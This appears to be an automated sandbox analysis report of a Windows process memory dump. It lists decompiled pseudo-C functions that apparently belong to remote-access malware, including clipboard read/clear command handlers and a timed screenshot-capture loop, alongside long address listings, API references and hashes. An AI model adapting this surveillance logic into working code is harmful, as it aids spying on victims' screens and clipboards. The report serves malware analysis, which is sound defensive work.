										__ecx =  &_v400;
										__eax = E0074427F(__ebx,  &_v400,  !=  ? __edi : 0x79f724);
										__esp = __esp - 0x18;
										__edx =  &_v404;
										__ecx = __esp;
										__eax = E0075739C(__ebx, __esp, __edx);
										_push(0x6b);
										__ecx = 0x7ac780;
										__eax = E00744AA4(__ebx, 0x7ac780, __edx, __eflags);
										L106:
										__ecx =  &_v400;
										L107:
										__eax = E00741EF0();
									}
									goto L126;
								case 0x25:
									__eflags = OpenClipboard(0);
									if(__eflags != 0) {
										__eax = EmptyClipboard();
										__ecx =  &_v420;
										__ecx = E00741E49( &_v420, __edx, __eflags, 0);
										__eax = E00742489();
										__eax = __eax + 2;
										__edi = __eax;
										__eax = GlobalLock(__edi);
										__ecx =  &_v424;
										__esi = __eax;
										__ecx = E00741E49( &_v424, __edx, __eflags, 0);
										__eax = E00742489();
										__ecx =  &_v428;
										__ecx = E00741E49( &_v428, __edx, __eflags, 0);
										GlobalUnlock(__edi) = SetClipboardData(0xd, __edi);
										goto L80;
									}
									goto L126;
								case 0x26:
									__eax = OpenClipboard(0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = EmptyClipboard();
										L80:
										__eax = CloseClipboard();
										goto L81;
									}
									goto L126;
								case 0x27:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									__eax = E00742489();
									__ecx =  &_v424;
									__esi = __eax;
									__ecx = E00741E49( &_v424, __edx, __eflags, 0);
									__eax = E00741F95(__eax);
									__edx = __esi;
									__ecx = __eax;
									__eax = E0074F69B();
									goto L126;
								case 0x28:
									__eax =  &_v404;
									__ebx = 0;
									__ecx =  &_v420;
									_v404 = 0;
									_v408 = 0;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									__eax = E00741F95(__eax);
									__edx =  &_v412;
									__ecx = __eax;
									__eax = E00757111(__eax, __edx,  &_v404);
									__eflags = __eax - 1;
									if(__eax == 1) {
										__edx = _v404;
										__ecx = _v408;
										E0074F69B() = L007794F1(_v408);
										L26:
										_pop(__ecx);
									}
									goto L126;
								case 0x29:
									__eax = E0074A732(__edx);
									goto L126;
								case 0x2a:
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00753CC0(__edx);
									goto L103;
								case 0x2b:
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E007517F1(__edx);
									goto L103;
								case 0x2c:
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00745367(__edx);
									goto L103;
								case 0x2d:
									_push(__ecx);
									__esi = 0x7ac560;
									__ecx = 0x7ac560;
									__eax = E00742489();
									__ecx = 0x7ac560;
									__eax = E00741F95(0x7ac560);
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = E00741E49( &_v420, __edx, __eflags, 0);
									E00742489() = __eax + 1;
									__ecx =  &_v424;
									__ecx = E00741E49( &_v424, __edx, __eflags, 0);
									__eax = E00741F95(__eax);
									__ecx = 0x7ac518;
									__edx = E00741F95(0x7ac518);
									__eax = E00750C80(__edx, __eflags, "name", __eax, __eax, __eax, __eax);
									goto L103;
								case 0x2e:
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E0074EE3B(__edx);
									goto L103;
								case 0x2f:
									__ecx =  &_v420;
									__eax = E00741E49( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E00755B9C(__edx);
									L103:
									goto L126;
							}
						}
					}
				}
				L140:
			}

0x007523b9
0x007523b9
0x007523b9
0x007523c9
0x007523cb
0x007523d3
0x007523db
0x007523f8
0x00752402
0x00752407
0x00752412
0x00752417
0x00752424
0x0075242d
0x00752437
0x0075243a
0x0075243c
0x007530ad
0x007530b3
0x007530b6
0x007530c3
0x00000000
0x007530ef
0x007530f8
0x007530fa
0x00753106
0x00753108
0x00000000
0x00000000
0x00753114
0x0075311d
0x0075311f
0x00753125
0x0075312d
0x00753131
0x00753138
0x0075313a
0x00753140
0x00753142
0x00753146
0x0075314c
0x00753150
0x00753157
0x0075315b
0x0075315d
0x00753162
0x00753165
0x00753168
0x0075316d
0x0075316f
0x00753174
0x00753177
0x00753180
0x00753182
0x00753184
0x00000000
0x00000000
0x00753214
0x0075321d
0x0075321f
0x00753227
0x00753230
0x00753232
0x0075323f
0x00000000
0x00000000
0x0075328c
0x00753290
0x00753295
0x00753298
0x007532a0
0x00000000
0x00000000
0x007532ac
0x007532b0
0x007532b5
0x007532b8
0x007532c0
0x00000000
0x00000000
0x007530db
0x007530e0
0x00000000
0x00000000
0x0075324c
0x00753250
0x00753255
0x00753258
0x00753260
0x00000000
0x00000000
0x0075326c
0x00753270
0x00753275
0x00753278
0x00753280
0x00000000
0x00000000
0x00753350
0x00000000
0x00000000
0x00753357
0x00000000
0x00000000
0x0075335e
0x00000000
0x00000000
0x00753321
0x00753323
0x0075332e
0x00753330
0x00753337
0x0075333b
0x0075333d
0x00753340
0x00753345
0x00753347
0x00753349
0x00000000
0x00000000
0x007532ca
0x00000000
0x00000000
0x00753365
0x0075336c
0x00753370
0x00753372
0x00753377
0x0075337a
0x0075337e
0x00753380
0x0075338d
0x0075338f
0x00753399
0x0075339b
0x0075339d
0x007533a3
0x00000000
0x00000000
0x007532d4
0x007532db
0x00753316
0x007532dd
0x007532dd
0x007532df
0x007532e4
0x007532f0
0x007532f6
0x007532f6
0x00000000
0x00000000
0x00753202
0x00000000
0x00000000
0x00753209
0x0075320b
0x0075320c
0x00000000
0x00000000
0x00753197
0x0075319e
0x007531a5
0x007531a9
0x007531ae
0x007531b1
0x007531b4
0x007531bb
0x007531bf
0x007531c4
0x007531c7
0x007531ca
0x007531d1
0x007531d5
0x007531da
0x007531dd
0x007531e0
0x007531e5
0x007531ec
0x007531f1
0x007531f8
0x00000000
0x00000000
0x00000000
0x00000000
0x007530c3
0x00000000
0x00752442
0x00752442
0x00752fbb
0x00752fd8
0x00752fe3
0x00752fed
0x00752ffd
0x00752ffd
0x00753000
0x00753005
0x0075300b
0x00753016
0x00753021
0x0075303e
0x0075305b
0x00753067
0x0075306c
0x00753074
0x00753097
0x00753097
0x007530a3
0x00000000
0x00752448
0x00752448
0x0075244c
0x007533c4
0x007533c4
0x007533c8
0x007533d4
0x007533e0
0x007533ed
0x00752452
0x00752454
0x00000000
0x00752467
0x00752481
0x0075249d
0x007524f8
0x007524fc
0x00752507
0x0075250b
0x00752514
0x00752520
0x0075252c
0x00752538
0x00752544
0x00752550
0x0075255c
0x00752565
0x0075256e
0x00752586
0x0075258e
0x007525bb
0x007525c0
0x007525c7
0x007525cc
0x007525ce
0x007525d4
0x007525d5
0x00000000
0x007525d5
0x00752590
0x00752592
0x0075259c
0x007525ac
0x0075259e
0x0075259f
0x0075259f
0x0075259c
0x00000000
0x00000000
0x007525e1
0x007525e3
0x007525d7
0x007525d7
0x00000000
0x00000000
0x00752f50
0x00752f54
0x00752f59
0x00752f5c
0x00752f5e
0x00752f60
0x00752f65
0x00752f67
0x00752f6c
0x00752f71
0x00000000
0x00000000
0x00000000
0x00000000
0x007525f1
0x007525f8
0x007525fd
0x00752600
0x00752604
0x00752606
0x00752611
0x00752613
0x0075261d
0x0075261f
0x00752621
0x00752627
0x007533a8
0x007533a8
0x007533ad
0x007533b2
0x007533b6
0x007533bb
0x007533bf
0x00000000
0x00000000
0x00752630
0x00752639
0x0075263b
0x00752647
0x00752649
0x00000000
0x00000000
0x007526d1
0x007526d1
0x00000000
0x00000000
0x00752655
0x0075265e
0x00752660
0x0075266d
0x00000000
0x00000000
0x00752678
0x00000000
0x00000000
0x0075269f
0x0075267a
0x0075267a
0x0075267c
0x0075267c
0x00752685
0x00752687
0x00752694
0x00000000
0x00000000
0x007526a3
0x007526aa
0x007526b3
0x007526b5
0x007526c2
0x007526c8
0x007526cc
0x00000000
0x00000000
0x007526db
0x007526dd
0x007526e9
0x007526eb
0x007526f1
0x007526f5
0x007526fb
0x00752700
0x0075270a
0x0075271d
0x00752723
0x00752727
0x0075272c
0x00000000
0x00000000
0x00752737
0x0075273b
0x00752741
0x00752746
0x0075274b
0x00752751
0x00752759
0x0075275d
0x00752762
0x00752765
0x0075276d
0x00000000
0x0075276d
0x00000000
0x00000000
0x00752779
0x0075277b
0x00752787
0x00752795
0x00000000
0x00000000
0x007527a2
0x007527a6
0x007527ac
0x007527b1
0x007527b8
0x007527c1
0x007527c3
0x007527cf
0x007527d1
0x007527d9
0x007527e2
0x007527e4
0x007527ea
0x007527f0
0x007527f2
0x007527f8
0x007527f8
0x007527f8
0x00752800
0x00752808
0x0075280e
0x00752810
0x00752812
0x00000000
0x00000000
0x0075281d
0x0075281e
0x00752823
0x00752825
0x00752826
0x00752828
0x00752828
0x00000000
0x00000000
0x0075282b
0x0075282f
0x00752834
0x00752837
0x0075283a
0x0075283f
0x00752844
0x00000000
0x00000000
0x0075284e
0x00752853
0x00000000
0x00000000
0x0075285d
0x00752862
0x00000000
0x00000000
0x0075286e
0x00752872
0x00752878
0x0075287d
0x00752882
0x00000000
0x00000000
0x00752891
0x00752891
0x00752892
0x00752897
0x0075289d
0x007528a2
0x007528a5
0x007528a8
0x007528ad
0x007528b2
0x00000000
0x00000000
0x007528c2
0x007528c7
0x007528c9
0x007528ce
0x00752887
0x00752887
0x00000000
0x00000000
0x00752f9a
0x00752f9b
0x00752fa0
0x00752fa6
0x00752fa8
0x00752faa
0x00752faa
0x00000000
0x00000000
0x007528d2
0x007528d4
0x007528d9
0x007528df
0x007528e4
0x007528e9
0x007528ee
0x007528f3
0x007528f6
0x007528fb
0x007528fd
0x007528fe
0x007528ff
0x00752900
0x00752901
0x00752906
0x00752908
0x0075290d
0x00752910
0x00752912
0x00752917
0x0075291d
0x00752928
0x0075291f
0x0075291f
0x00752924
0x0075292f
0x00752931
0x0075293c
0x0075293e
0x00000000
0x00000000
0x00752948
0x0075294e
0x00752953
0x00000000
0x00000000
0x0075295d
0x0075295f
0x00752965
0x0075296b
0x00752970
0x00752973
0x00752976
0x0075297d
0x00752986
0x00752988
0x00752994
0x00752997
0x007529a0
0x007529a2
0x007529a8
0x007529af
0x007529b3
0x007529ba
0x007529bc
0x007529c2
0x007529c8
0x007529ca
0x007529cc
0x00000000
0x00000000
0x007529d9
0x007529da
0x007529df
0x007529f2
0x00000000
0x00000000
0x007529fd
0x007529fd
0x007529fe
0x00752a03
0x00752a09
0x00752a0e
0x00752a11
0x00752a14
0x00752a1b
0x00752a1f
0x00752a24
0x00752a27
0x00752a2f
0x00752a34
0x007528b7
0x007528b7
0x00000000
0x00000000
0x00752a3e
0x00752a47
0x00752a4f
0x00000000
0x00000000
0x00752a5a
0x00752a61
0x00000000
0x00752a6f
0x00752a6f
0x00752a75
0x00000000
0x00000000
0x00752a69
0x00752a69
0x00752a7b
0x00752a7b
0x007533f0
0x007533f5
0x007533f6
0x007533f8
0x007533fa
0x007533fa
0x007533ff
0x00753401
0x00753403
0x00753405
0x00753407
0x00753409
0x00753410
0x00753412
0x00753415
0x00753416
0x00753419
0x0075341b
0x0075341d
0x0075341e
0x00753421
0x00753426
0x00753429
0x00753429
0x0075342e
0x0075342f
0x00753431
0x00753436
0x00753439
0x00753439
0x0075343b
0x0075343d
0x0075343e
0x0075343e
0x0075343e
0x00753442
0x00753445
0x00753446
0x00753449
0x00753449
0x00753449
0x0075344a
0x0075344a
0x0075344d
0x00000000
0x00000000
0x00752a7c
0x00000000
0x00000000
0x00752a8e
0x00752a8e
0x00752a94
0x00000000
0x00000000
0x00752a88
0x00752a88
0x00752a96
0x00752a98
0x00752aa2
0x00752aa4
0x00752aab
0x00752aaf
0x00752ab6
0x00752ab8
0x00752abd
0x00752abf
0x00752ac4
0x00752aca
0x00752acb
0x00752acc
0x00752ad5
0x00752ad8
0x00752ae1
0x00752ae3
0x00752ae8
0x00752ae9
0x00752aea
0x00752af0
0x00752af2
0x00000000
0x00000000
0x00000000
0x00000000
0x00752b1c
0x00752b1c
0x00752b22
0x00000000
0x00000000
0x00752b16
0x00752b16
0x00752b26
0x00752b2f
0x00752b31
0x00752b38
0x00752b3c
0x00752b43
0x00752b45
0x00752b4a
0x00752b4c
0x00752b51
0x00752b57
0x00752b5b
0x00752b62
0x00752b66
0x00752b68
0x00752b6d
0x00752b70
0x00752b73
0x00752b78
0x00752b7a
0x00752b7f
0x00752b82
0x00752b84
0x00752af8
0x00752af8
0x00752afb
0x00752aff
0x00752b07
0x00752b0c
0x00752b0c
0x00000000
0x00000000
0x00752b91
0x00752b9a
0x00752b9c
0x00752ba8
0x00752bad
0x00752bb9
0x00752bbb
0x00752bc1
0x00752bc3
0x00752bcd
0x00752bd6
0x00000000
0x00000000
0x00752be1
0x00752be6
0x00752be8
0x00752bed
0x00752bf2
0x00752bf7
0x00752bf9
0x00752bfe
0x00752c02
0x00752c03
0x00752c05
0x00752c1d
0x00752c22
0x00752c27
0x00752c29
0x00752c2e
0x00752c32
0x00752c33
0x00752c35
0x00752c50
0x00752c55
0x00752c5a
0x00752c5c
0x00752c61
0x00752c63
0x00752c98
0x00752c9f
0x00752ca6
0x00752caa
0x00752cac
0x00752cb1
0x00752cb6
0x00752cb8
0x00752cbd
0x00752cbe
0x00752cc0
0x00752cc6
0x00752cca
0x00752ccf
0x00752cd4
0x00752cd6
0x00752cdb
0x00752cdd
0x00752ce3
0x00752ce4
0x00752ce5
0x00000000
0x00752ce5
0x00752cc2
0x00752cc2
0x00752cc3
0x00752ce7
0x00752ce7
0x00752ce7
0x00752c65
0x00752c65
0x00752c68
0x00752c71
0x00752c73
0x00752c79
0x00752c7e
0x00752c7e
0x00000000
0x00752c7e
0x00752c37
0x00752c3e
0x00752c40
0x00752c46
0x00752c4b
0x00000000
0x00752c4b
0x00752c07
0x00752c0e
0x00752c10
0x00752c16
0x00752c81
0x00752c81
0x00752c83
0x00752c83
0x00000000
0x00000000
0x00752d88
0x00752d89
0x00752d8f
0x00752d91
0x00752d9f
0x00752da9
0x00752db1
0x00752db7
0x00752dbe
0x00752dc2
0x00752dc6
0x00752dcb
0x00752dce
0x00752dd2
0x00752dd4
0x00752dd9
0x00752ddb
0x00752de0
0x00753189
0x00753189
0x0075318d
0x0075318d
0x0075318d
0x00000000
0x00000000
0x00752cf5
0x00752cf7
0x00752cfd
0x00752d04
0x00752d0d
0x00752d0f
0x00752d14
0x00752d23
0x00752d26
0x00752d2d
0x00752d31
0x00752d38
0x00752d3a
0x00752d41
0x00752d4a
0x00752d65
0x00000000
0x00752d65
0x00000000
0x00000000
0x00752d6e
0x00752d74
0x00752d76
0x00752d7c
0x00752d82
0x00752d82
0x00000000
0x00752d82
0x00000000
0x00000000
0x00752dea
0x00752dec
0x00752df6
0x00752df8
0x00752dfe
0x00752e02
0x00752e09
0x00752e0b
0x00752e10
0x00752e12
0x00752e14
0x00000000
0x00000000
0x00752e1e
0x00752e22
0x00752e26
0x00752e2a
0x00752e2e
0x00752e37
0x00752e39
0x00752e3e
0x00752e42
0x00752e44
0x00752e4a
0x00752e4d
0x00752e53
0x00752e57
0x00752e64
0x00752817
0x00752817
0x00752817
0x00000000
0x00000000
0x00752e6e
0x00000000
0x00000000
0x00752e7a
0x00752e7e
0x00752e83
0x00752e86
0x00752e8e
0x00000000
0x00000000
0x00752e9a
0x00752e9e
0x00752ea3
0x00752ea6
0x00752eae
0x00000000
0x00000000
0x00752eba
0x00752ebe
0x00752ec3
0x00752ec6
0x00752ece
0x00000000
0x00000000
0x00752ed8
0x00752ed9
0x00752ede
0x00752ee0
0x00752ee6
0x00752ee8
0x00752eee
0x00752ef0
0x00752efa
0x00752f01
0x00752f02
0x00752f0d
0x00752f0f
0x00752f1a
0x00752f24
0x00752f26
0x00000000
0x00000000
0x00752f32
0x00752f36
0x00752f3b
0x00752f3e
0x00752f46
0x00000000
0x00000000
0x00752f7c
0x00752f80
0x00752f85
0x00752f88
0x00752f90
0x007530e5
0x00000000
0x00000000
0x00752454
0x0075244c
0x00752442
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 007523DB
GetTickCount.KERNEL32 ref: 0075245B

Strings

8Et, xrefs: 007533C4

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CountEventTick
String ID: 8Et
API String ID: 180926312-257909599
Opcode ID: a395c304133d9bba73f2d5d32bebd5a9afa50e3acbbbb3d1901d7f5347ddb164
Instruction ID: 01a06eae8bf0f879c0b22897177b6dc0894093215801c7755edb1d3547f05094
Opcode Fuzzy Hash: a395c304133d9bba73f2d5d32bebd5a9afa50e3acbbbb3d1901d7f5347ddb164
Instruction Fuzzy Hash: 29E17F31608300DBC614F770D85FBEE76A8AF95701F80492DB946971E2EF6C9A4DC792

Uniqueness

Uniqueness Score: -1.00%

Function 00755938, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176
sleeptimeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00755938() {
				intOrPtr* _t42;
				void* _t45;
				char* _t54;
				void* _t72;
				long _t78;
				void* _t83;
				struct _SECURITY_ATTRIBUTES* _t85;
				struct _SECURITY_ATTRIBUTES* _t92;
				void* _t131;
				void* _t132;
				void* _t140;
				void* _t141;
				void* _t146;
				intOrPtr _t147;
				void* _t148;
				void* _t149;
				void* _t150;

				E007910A8(E0079265E, _t146);
				_push(_t141);
				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
				_t92 = 0;
				 *((intOrPtr*)(_t146 - 4)) = 0;
				_t149 =  *0x7abea0 - _t92; // 0x0
				if(_t149 == 0) {
					_t147 = _t147 - 0xc;
					_t131 = _t146 - 0x68;
					E007543BF(_t131);
					__imp__GdiplusStartup(0x7abea0, _t131, 0);
				}
				_t150 =  *0x7abd70 - _t92; // 0x0
				if(_t150 == 0) {
					E00741EFA(0x7ac898, _t132, _t141, E00754E7E(_t146 - 0x40));
					E00741EF0();
				}
				_t42 = E00741F95(E00741E49(0x7ac578, _t132, _t150, 0x19));
				_t45 = E00741EEB(E007572DA(_t146 - 0x58, E00741E49(0x7ac578, _t132, _t150, 0x1a)));
				_t134 =  *_t42;
				E00741EFA(0x7ac880,  *_t42, 0x7ac880, E0075805B(_t146 - 0x40,  *_t42, _t45));
				E00741EF0();
				E00741EF0();
				CreateDirectoryW(E00741EEB(0x7ac880), _t92);
				E00741F6D(_t92, _t146 - 0xb0);
				E00741F6D(_t92, _t146 - 0x80);
				 *(_t146 - 0x11) = _t92;
				 *0x7abd6b = 1;
				_t54 =  *((intOrPtr*)(_t146 + 8));
				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
				_t140 = Sleep;
				L6:
				while(1) {
					if( *_t54 != 1) {
						L11:
						GetLocalTime(_t146 - 0x28);
						_push( *(_t146 - 0x1c) & 0x0000ffff);
						_push( *(_t146 - 0x1e) & 0x0000ffff);
						_push( *(_t146 - 0x20) & 0x0000ffff);
						_push( *(_t146 - 0x22) & 0x0000ffff);
						_push( *(_t146 - 0x26) & 0x0000ffff);
						E00754398(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
						_t147 = _t147 + 0x20;
						E00741EFA(_t146 - 0x80, _t66, _t145, E007430A6(_t92, _t146 - 0x58, E007430A6(_t92, _t146 - 0x40, E00747514(_t146 - 0x98, 0x7ac880, __eflags, "\\"), _t140, __eflags, _t146 - 0x2b8), _t140, __eflags, "."));
						E00741EF0();
						E00741EF0();
						E00741EF0();
						_t72 = E00741EEB(_t146 - 0x80);
						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
						E0075576E(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
						if(__eflags != 0) {
							_t92 = 0;
							 *(_t146 - 0x11) = 0;
							_t78 = E00776769(_t75, E00741F95(E00741E49(0x7ac578, _t134, __eflags, 0x18))) * 0x3e8;
							__eflags = _t78;
						} else {
							_t78 = E00776769(_t79, E00741F95(E00741E49(0x7ac578, _t134, __eflags, 0x15))) * 0xea60;
						}
						Sleep(_t78);
						_t54 =  *((intOrPtr*)(_t146 + 8));
						continue;
					}
					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
					while(1) {
						_t153 = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						_t83 = E00741F95(E00741E49(0x7ac578, _t134, _t153, 0x17));
						_t148 = _t147 - 0x18;
						E0074427F(_t92, _t148, _t83);
						_t85 = E00757ABF(0, _t134);
						_t147 = _t148 + 0x18;
						_t92 = _t85;
						 *(_t146 - 0x11) = _t92;
						if(_t92 != 0) {
							goto L11;
						}
						Sleep(0x3e8);
					}
					goto L11;
				}
			}

0x0075593d
0x00755949
0x0075594b
0x0075594e
0x00755950
0x00755953
0x00755959
0x0075595b
0x0075595e
0x00755961
0x0075596f
0x0075596f
0x00755975
0x0075597b
0x0075598b
0x00755993
0x00755993
0x007559a8
0x007559c4
0x007559ca
0x007559dd
0x007559e5
0x007559ed
0x007559fb
0x00755a07
0x00755a0f
0x00755a14
0x00755a17
0x00755a28
0x00755a2e
0x00755a31
0x00755a34
0x00000000
0x00755a3a
0x00755a3d
0x00755a85
0x00755a89
0x00755a93
0x00755a98
0x00755a9d
0x00755aa2
0x00755aa7
0x00755ab5
0x00755aba
0x00755af9
0x00755b01
0x00755b09
0x00755b14
0x00755b1c
0x00755b24
0x00755b29
0x00755b36
0x00755b39
0x00755b57
0x00755b59
0x00755b70
0x00755b70
0x00755b3b
0x00755b4f
0x00755b4f
0x00755b78
0x00755b7a
0x00000000
0x00755b7a
0x00755a3f
0x00755a44
0x00755a47
0x00755a47
0x00755a49
0x00000000
0x00000000
0x00755a59
0x00755a5e
0x00755a64
0x00755a6b
0x00755a70
0x00755a73
0x00755a75
0x00755a7a
0x00000000
0x00000000
0x00755a81
0x00755a81
0x00000000
0x00755a47

APIs

__EH_prolog.LIBCMT ref: 0075593D
GdiplusStartup.GDIPLUS(007ABEA0,?,00000000), ref: 0075596F

Part of subcall function 00747514: char_traits.LIBCPMT ref: 0074752F

Part of subcall function 0075576E: DeleteFileW.KERNEL32(00000000,0000001B), ref: 00755858

CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 007559FB
Sleep.KERNEL32(000003E8), ref: 00755A81
GetLocalTime.KERNEL32(?), ref: 00755A89
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00755B78

Strings

wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 00755A1E, 00755A3F, 00755AAD
time_%04i%02i%02i_%02i%02i%02i, xrefs: 00755A23

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Sleep$CreateDeleteDirectoryFileGdiplusH_prologLocalStartupTimechar_traits
String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 649275306-3790400642
Opcode ID: 8ffbb10cc62d5628357d0f07a1ee444002d4eab3320a61653dcb2281888556a8
Instruction ID: 704bde8e68b62a85389c231d677695a6fe637731e2dfae49ab3506c772f8aae3
Opcode Fuzzy Hash: 8ffbb10cc62d5628357d0f07a1ee444002d4eab3320a61653dcb2281888556a8
Instruction Fuzzy Hash: 2C51A471A00258EACB04FBB4DC6A9FE7B79AF55301F804129F905AB192DF7C5E89C760

Uniqueness

Uniqueness Score: -1.00%

Function 0078FB34, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0079067F), ref: 0078FB57

Strings

exp, xrefs: 0078FC1C, 0078FC7E
asin, xrefs: 0078FCC3
pow, xrefs: 0078FC3B, 0078FCE7, 0078FCFA
sqrt, xrefs: 0078FCDB
log10, xrefs: 0078FBA1, 0078FBF1
log, xrefs: 0078FBFD, 0078FC09
acos, xrefs: 0078FCCF

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa03f84800add098559e592342249f162038e097ed80b5fb6a9d368f0e6cc4fd
Instruction ID: 6017bec1623172a7ca06c13e1556260c3aac35decb39e7d530f86f0af0e52564
Opcode Fuzzy Hash: aa03f84800add098559e592342249f162038e097ed80b5fb6a9d368f0e6cc4fd
Instruction Fuzzy Hash: 83519FB094060DDBCF10EF68E9585ADBFB4FF49304F6041A5D981AB264DB3D8E25CB29

Uniqueness

Uniqueness Score: -1.00%

Function 00784B6E, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152
fileCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00784B6E(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0x7aa00c; // 0x67a7e35e
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x7ab800 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0x7ab800 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E0077F3A5(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0x7ab800 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0x7ab800 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x7ab800 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00783630( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00783630();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								_t45 =  &_v36; // 0x7852e3
								if(WriteFile(_v44,  &_v24, _t97, _t45, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											_t55 =  &_v36; // 0x7852e3
											if(WriteFile(_v44,  &_v32, 1, _t55, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E0076FD1B(_v8 ^ _t136);
			}

0x00784b76
0x00784b7d
0x00784b80
0x00784b88
0x00784b8c
0x00784b98
0x00784b9b
0x00784b9e
0x00784ba5
0x00784bad
0x00784bb0
0x00784bb6
0x00784bbc
0x00784bc1
0x00784bc3
0x00784bc6
